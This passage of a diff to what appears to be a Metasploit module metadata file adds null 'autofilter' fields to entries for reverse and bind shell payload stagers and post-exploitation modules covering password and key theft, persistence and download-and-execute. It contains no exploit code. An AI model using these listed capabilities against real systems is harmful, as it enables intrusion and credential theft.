-113615,6 +142518,8 @@ "platform": "Windows", "arch": "x64", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-03-04 17:43:15 +0000", "path": "/modules/payloads/stagers/windows/x64/reverse_tcp_rc4.rb", @@ -113645,6 +142550,8 @@ "platform": "Windows", "arch": "x64", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/windows/x64/reverse_tcp_uuid.rb", @@ -113674,6 +142581,8 @@ "platform": "Windows", "arch": "x64", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/singles/windows/x64/shell_bind_tcp.rb", @@ -113703,6 +142612,8 @@ "platform": "Windows", "arch": "x64", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/singles/windows/x64/shell_reverse_tcp.rb", @@ -113733,6 +142644,8 @@ "platform": "Windows", "arch": "x64", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/windows/x64/bind_ipv6_tcp.rb", @@ -113764,6 +142677,8 @@ "platform": "Windows", "arch": "x64", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/windows/x64/bind_ipv6_tcp_uuid.rb", @@ -113795,6 +142710,8 @@ "platform": "Windows", "arch": "x64", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-02-15 17:37:33 +0000", "path": "/modules/payloads/stagers/windows/x64/bind_named_pipe.rb", @@ -113825,6 +142742,8 @@ "platform": "Windows", "arch": "x64", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/windows/x64/bind_tcp.rb", @@ -113856,6 +142775,8 @@ "platform": "Windows", "arch": "x64", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/windows/x64/bind_tcp_uuid.rb", @@ -113887,6 +142808,8 @@ "platform": "Windows", "arch": "x64", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-03-20 11:27:43 +0000", "path": "/modules/payloads/stagers/windows/x64/reverse_http.rb", @@ -113920,6 +142843,8 @@ "platform": "Windows", "arch": "x64", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-03-20 11:27:43 +0000", "path": "/modules/payloads/stagers/windows/x64/reverse_https.rb", @@ -113950,6 +142875,8 @@ "platform": "Windows", "arch": "x64", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/windows/x64/reverse_tcp.rb", @@ -113985,6 +142912,8 @@ "platform": "Windows", "arch": "x64", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-03-04 17:43:15 +0000", "path": "/modules/payloads/stagers/windows/x64/reverse_tcp_rc4.rb", @@ -114016,6 +142945,8 @@ "platform": "Windows", "arch": "x64", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/windows/x64/reverse_tcp_uuid.rb", @@ -114047,6 +142978,8 @@ "platform": "Windows", "arch": "x64", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-03-20 11:27:43 +0000", "path": "/modules/payloads/stagers/windows/x64/reverse_winhttp.rb", @@ -114078,6 +143011,8 @@ "platform": "Windows", "arch": "x64", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-03-20 11:27:43 +0000", "path": "/modules/payloads/stagers/windows/x64/reverse_winhttps.rb", @@ -114107,6 +143042,8 @@ "platform": "AIX", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/aix/hashdump.rb", @@ -114136,6 +143073,8 @@ "platform": "Android", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/android/capture/screen.rb", @@ -114166,6 +143105,8 @@ "platform": "Android", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-05-06 17:37:12 +0000", "path": "/modules/post/android/gather/wireless_ap.rb", @@ -114198,6 +143139,8 @@ "platform": "Android", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/android/manage/remove_lock.rb", @@ -114227,6 +143170,8 @@ "platform": "Android", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/android/manage/remove_lock_root.rb", @@ -114256,6 +143201,8 @@ "platform": "Android", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-07-26 16:48:34 +0000", "path": "/modules/post/android/sub_info.rb", @@ -114285,6 +143232,8 @@ "platform": "Cisco", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/cisco/gather/enum_cisco.rb", @@ -114314,6 +143263,8 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/firefox/gather/cookies.rb", @@ -114343,6 +143294,8 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/firefox/gather/history.rb", @@ -114372,6 +143325,8 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/firefox/gather/passwords.rb", @@ -114401,6 +143356,8 @@ "platform": "Firefox", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/firefox/gather/xss.rb", @@ -114430,6 +143387,8 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/firefox/manage/webcam_chat.rb", @@ -114459,6 +143418,8 @@ "platform": "Hardware", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/hardware/automotive/canprobe.rb", @@ -114488,6 +143449,8 @@ "platform": "Hardware", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-09-11 18:20:57 +0000", "path": "/modules/post/hardware/automotive/getvinfo.rb", @@ -114517,6 +143480,8 @@ "platform": "Hardware", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/hardware/automotive/identifymodules.rb", @@ -114546,6 +143511,8 @@ "platform": "Hardware", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/hardware/automotive/malibu_overheat.rb", @@ -114578,6 +143545,8 @@ "platform": "Hardware", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-12-17 18:15:49 +0000", "path": "/modules/post/hardware/automotive/pdt.rb", @@ -114607,6 +143576,8 @@ "platform": "Hardware", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/hardware/rftransceiver/rfpwnon.rb", @@ -114636,6 +143607,8 @@ "platform": "Hardware", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/hardware/rftransceiver/transmitter.rb", @@ -114665,6 +143638,8 @@ "platform": "Hardware", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/hardware/zigbee/zstumbler.rb", @@ -114694,6 +143669,8 @@ "platform": "Juniper", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-07-30 14:20:01 +0000", "path": "/modules/post/juniper/gather/enum_juniper.rb", @@ -114723,6 +143700,8 @@ "platform": "Linux", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/linux/busybox/enum_connections.rb", @@ -114752,6 +143731,8 @@ "platform": "Linux", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/linux/busybox/enum_hosts.rb", @@ -114781,6 +143762,8 @@ "platform": "Linux", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-09-17 16:00:04 +0000", "path": "/modules/post/linux/busybox/jailbreak.rb", @@ -114810,6 +143793,8 @@ "platform": "Linux", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/linux/busybox/ping_net.rb", @@ -114839,6 +143824,8 @@ "platform": "Linux", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/linux/busybox/set_dmz.rb", @@ -114868,6 +143855,8 @@ "platform": "Linux", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/linux/busybox/set_dns.rb", @@ -114897,6 +143886,8 @@ "platform": "Linux", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/linux/busybox/smb_share_root.rb", @@ -114926,6 +143917,8 @@ "platform": "Linux", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/linux/busybox/wget_exec.rb", @@ -114956,6 +143949,8 @@ "platform": "Linux", "arch": "x64", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-09-17 16:00:04 +0000", "path": "/modules/post/linux/dos/xen_420_dos.rb", @@ -114985,6 +143980,8 @@ "platform": "Linux", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-08-06 00:46:09 +0000", "path": "/modules/post/linux/gather/checkcontainer.rb", @@ -115014,6 +144011,8 @@ "platform": "Linux", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-08-04 19:12:27 +0000", "path": "/modules/post/linux/gather/checkvm.rb", @@ -115043,6 +144042,8 @@ "platform": "Linux", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/linux/gather/ecryptfs_creds.rb", @@ -115072,6 +144073,8 @@ "platform": "Linux", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/linux/gather/enum_configs.rb", @@ -115102,6 +144105,8 @@ "platform": "Linux", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-05-30 15:32:04 +0000", "path": "/modules/post/linux/gather/enum_network.rb", @@ -115131,6 +144136,8 @@ "platform": "Linux", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-04-29 06:52:47 +0000", "path": "/modules/post/linux/gather/enum_protections.rb", @@ -115160,6 +144167,8 @@ "platform": "Linux", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/linux/gather/enum_psk.rb", @@ -115193,6 +144202,8 @@ "platform": "Linux", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/linux/gather/enum_system.rb", @@ -115222,6 +144233,8 @@ "platform": "Linux", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/linux/gather/enum_users_history.rb", @@ -115251,6 +144264,8 @@ "platform": "Linux", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/linux/gather/enum_xchat.rb", @@ -115280,6 +144295,8 @@ "platform": "Linux", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/linux/gather/gnome_commander_creds.rb", @@ -115309,6 +144326,8 @@ "platform": "Linux", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/linux/gather/gnome_keyring_dump.rb", @@ -115338,6 +144357,8 @@ "platform": "Linux", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-08-16 00:56:32 +0000", "path": "/modules/post/linux/gather/hashdump.rb", @@ -115367,6 +144388,8 @@ "platform": "Linux", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-09-29 22:34:38 +0000", "path": "/modules/post/linux/gather/mount_cifs_creds.rb", @@ -115397,6 +144420,8 @@ "platform": "Linux", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/linux/gather/openvpn_credentials.rb", @@ -115427,6 +144452,8 @@ "platform": "Linux", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-09-07 11:13:09 +0000", "path": "/modules/post/linux/gather/phpmyadmin_credsteal.rb", @@ -115456,6 +144483,8 @@ "platform": "Linux", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-06-12 17:11:29 +0000", "path": "/modules/post/linux/gather/pptpd_chap_secrets.rb", @@ -115485,6 +144514,8 @@ "platform": "Linux", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-06-07 20:08:23 +0000", "path": "/modules/post/linux/gather/tor_hiddenservices.rb", @@ -115514,6 +144545,8 @@ "platform": "Linux", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/linux/manage/download_exec.rb", @@ -115543,6 +144576,8 @@ "platform": "Linux", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/linux/manage/sshkey_persistence.rb", @@ -115573,6 +144608,8 @@ "platform": "Unix", "arch": "", "rport": 443, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/multi/escalate/aws_create_iam_user.rb", @@ -115605,6 +144642,8 @@ "platform": "Linux,OSX", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/multi/escalate/cups_root_file_read.rb", @@ -115636,6 +144675,8 @@ "platform": "BSD,Linux,Unix", "arch": "", "rport": 2940, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-09-30 15:45:52 +0000", "path": "/modules/post/multi/escalate/metasploit_pcaplog.rb", @@ -115666,6 +144707,8 @@ "platform": "OSX,Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/multi/gather/apple_ios_backup.rb", @@ -115695,6 +144738,8 @@ "platform": "Unix", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-08-02 15:55:24 +0000", "path": "/modules/post/multi/gather/aws_ec2_instance_metadata.rb", @@ -115725,6 +144770,8 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/multi/gather/aws_keys.rb", @@ -115754,6 +144801,8 @@ "platform": "Linux,OSX,Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/multi/gather/check_malware.rb", @@ -115783,6 +144832,8 @@ "platform": "Linux,Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/multi/gather/dbvis_enum.rb", @@ -115812,6 +144863,8 @@ "platform": "BSD,Linux,OSX,Solaris,Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/multi/gather/dns_bruteforce.rb", @@ -115841,6 +144894,8 @@ "platform": "BSD,Linux,OSX,Solaris,Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/multi/gather/dns_reverse_lookup.rb", @@ -115870,6 +144925,8 @@ "platform": "BSD,Linux,OSX,Solaris,Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-09-17 19:38:43 +0000", "path": "/modules/post/multi/gather/dns_srv_lookup.rb", @@ -115899,6 +144956,8 @@ "platform": "BSD,Linux,OSX,Unix", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-08-25 18:15:24 +0000", "path": "/modules/post/multi/gather/docker_creds.rb", @@ -115928,6 +144987,8 @@ "platform": "BSD,Linux,OSX,Unix,Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-09-30 15:45:52 +0000", "path": "/modules/post/multi/gather/enum_vbox.rb", @@ -115958,6 +145019,8 @@ "platform": "Linux,Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/multi/gather/env.rb", @@ -115987,6 +145050,8 @@ "platform": "BSD,Linux,OSX,Unix", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/multi/gather/fetchmailrc_creds.rb", @@ -116017,6 +145082,8 @@ "platform": "BSD,Linux,OSX,Unix,Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/multi/gather/filezilla_client_cred.rb", @@ -116046,6 +145113,8 @@ "platform": "BSD,Linux,OSX,Unix,Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/multi/gather/find_vmx.rb", @@ -116077,6 +145146,8 @@ "platform": "BSD,Linux,OSX,Unix,Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/multi/gather/firefox_creds.rb", @@ -116106,6 +145177,8 @@ "platform": "BSD,Linux,OSX,Unix", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-28 10:16:59 +0000", "path": "/modules/post/multi/gather/gpg_creds.rb", @@ -116135,6 +145208,8 @@ "platform": "BSD,Linux,OSX,Unix", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/multi/gather/irssi_creds.rb", @@ -116164,6 +145239,8 @@ "platform": "Linux,Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/multi/gather/jboss_gather.rb", @@ -116193,6 +145270,8 @@ "platform": "Linux,Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-09-10 15:25:09 +0000", "path": "/modules/post/multi/gather/jenkins_gather.rb", @@ -116224,6 +145303,8 @@ "platform": "Linux,OSX,Unix,Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-09-30 15:45:52 +0000", "path": "/modules/post/multi/gather/lastpass_creds.rb", @@ -116253,6 +145334,8 @@ "platform": "BSD,Linux,OSX,Unix,Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-08-26 17:52:11 +0000", "path": "/modules/post/multi/gather/maven_creds.rb", @@ -116282,6 +145365,8 @@ "platform": "BSD,Linux,OSX,Unix,Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/multi/gather/multi_command.rb", @@ -116311,6 +145396,8 @@ "platform": "BSD,Linux,OSX,Unix", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/multi/gather/netrc_creds.rb", @@ -116340,6 +145427,8 @@ "platform": "BSD,Linux,OSX,Unix,Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/multi/gather/pgpass_creds.rb", @@ -116370,6 +145459,8 @@ "platform": "BSD,Linux,OSX,Unix,Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/multi/gather/pidgin_cred.rb", @@ -116399,6 +145490,8 @@ "platform": "BSD,Linux,OSX,Solaris,Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/multi/gather/ping_sweep.rb", @@ -116428,6 +145521,8 @@ "platform": "BSD,Linux,OSX,Unix", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-09-30 15:45:52 +0000", "path": "/modules/post/multi/gather/remmina_creds.rb", @@ -116457,6 +145552,8 @@ "platform": "Python,Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/multi/gather/resolve_hosts.rb", @@ -116486,6 +145583,8 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/multi/gather/rsyncd_creds.rb", @@ -116516,6 +145615,8 @@ "platform": "BSD,Linux,OSX,Unix", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/multi/gather/rubygems_api_key.rb", @@ -116545,6 +145646,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/multi/gather/run_console_rc_file.rb", @@ -116574,6 +145677,8 @@ "platform": "OSX,Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/multi/gather/skype_enum.rb", @@ -116603,6 +145708,8 @@ "platform": "BSD,Linux,OSX,Unix", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/multi/gather/ssh_creds.rb", @@ -116632,6 +145739,8 @@ "platform": "Linux,OSX,Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-09-17 16:00:04 +0000", "path": "/modules/post/multi/gather/thunderbird_creds.rb", @@ -116661,6 +145770,8 @@ "platform": "Linux,Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/multi/gather/tomcat_gather.rb", @@ -116690,6 +145801,8 @@ "platform": "BSD,Linux,OSX,Solaris,Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-10-01 19:49:32 +0000", "path": "/modules/post/multi/gather/wlan_geolocate.rb", @@ -116719,6 +145832,8 @@ "platform": "Linux,OSX,Unix,Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/multi/general/close.rb", @@ -116748,6 +145863,8 @@ "platform": "Linux,OSX,Unix,Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/multi/general/execute.rb", @@ -116777,6 +145894,8 @@ "platform": "Linux,OSX,Unix", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/multi/general/wall.rb", @@ -116807,6 +145926,8 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/multi/manage/autoroute.rb", @@ -116836,6 +145957,8 @@ "platform": "Linux,Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/multi/manage/dbvis_add_db_admin.rb", @@ -116865,6 +145988,8 @@ "platform": "Linux,Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/multi/manage/dbvis_query.rb", @@ -116895,6 +146020,8 @@ "platform": "Linux,OSX,Unix,Windows", "arch": "x86, x64", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-02-03 02:18:30 +0000", "path": "/modules/post/multi/manage/hsts_eraser.rb", @@ -116924,6 +146051,8 @@ "platform": "Linux,OSX,Solaris,Unix,Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/multi/manage/multi_post.rb", @@ -116953,6 +146082,8 @@ "platform": "Linux,OSX,Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-06-21 16:46:15 +0000", "path": "/modules/post/multi/manage/open.rb", @@ -116982,6 +146113,8 @@ "platform": "Android,Linux,OSX,Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-08-17 16:46:51 +0000", "path": "/modules/post/multi/manage/play_youtube.rb", @@ -117011,6 +146144,8 @@ "platform": "Linux,OSX,Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/multi/manage/record_mic.rb", @@ -117040,6 +146175,8 @@ "platform": "Linux,OSX,Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-06-21 16:46:00 +0000", "path": "/modules/post/multi/manage/screensaver.rb", @@ -117069,6 +146206,8 @@ "platform": "Android,Linux,OSX,Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/multi/manage/set_wallpaper.rb", @@ -117098,6 +146237,8 @@ "platform": "BSD,Linux,OSX,Solaris,Unix,Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-09-04 16:46:20 +0000", "path": "/modules/post/multi/manage/shell_to_meterpreter.rb", @@ -117128,6 +146269,8 @@ "platform": "AIX,Linux,OSX,Solaris,Unix", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/multi/manage/sudo.rb", @@ -117157,6 +146300,8 @@ "platform": "Linux,OSX,Unix", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-09-22 13:38:06 +0000", "path": 